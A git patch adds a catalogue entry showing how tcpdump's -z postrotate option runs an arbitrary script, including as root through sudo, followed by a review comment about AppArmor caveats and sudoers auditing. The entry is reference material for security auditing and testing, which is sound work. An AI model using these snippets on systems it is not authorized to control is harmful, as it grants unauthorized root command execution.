From 197b720be0bebefbe5aa32b8b276e3516fbb7ea5 Mon Sep 17 00:00:00 2001
From: t0thkr1s
Date: Fri, 10 Jan 2020 13:14:24 +0100
Subject: [PATCH] add data for tcpdump
---
data/tcpdump.json | 15 +++++++++++++++
1 file changed, 15 insertions(+)
create mode 100644 data/tcpdump.json
diff --git a/data/tcpdump.json b/data/tcpdump.json
new file mode 100644
index 0000000..7d6d0e1
--- /dev/null
+++ b/data/tcpdump.json
@@ -0,0 +1,15 @@
+{
+ "description": "These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background. In recent distributions (e.g., Debian 10 and Ubuntu 18) AppArmor limits the 'postrotate-command' to a small subset of predefined commands thus preventing the execution of the following.",
+ "functions": {
+ "command": [
+ {
+ "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\ntcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF\n"
+ }
+ ],
+ "sudo": [
+ {
+ "code": "TF=$(mktemp)\necho \"[command]\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
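Review bot: The `description` in the new `data/tcpdump.json` credits AppArmor with blocking the `-z` postrotate command on recent Debian and Ubuntu, but does not say that this holds only while the distribution's tcpdump profile is loaded and enforcing, so a reader may take those systems as safe by default. I would append a sentence such as `Where that profile is absent or not enforcing, a sudoers rule that allows tcpdump with arbitrary arguments should be treated as equivalent to granting root.` so administrators reading the entry know what to audit. "Ubuntu 18" would be clearer as the exact release the author checked, and the file ends without a trailing newline (`\ No newline at end of file`).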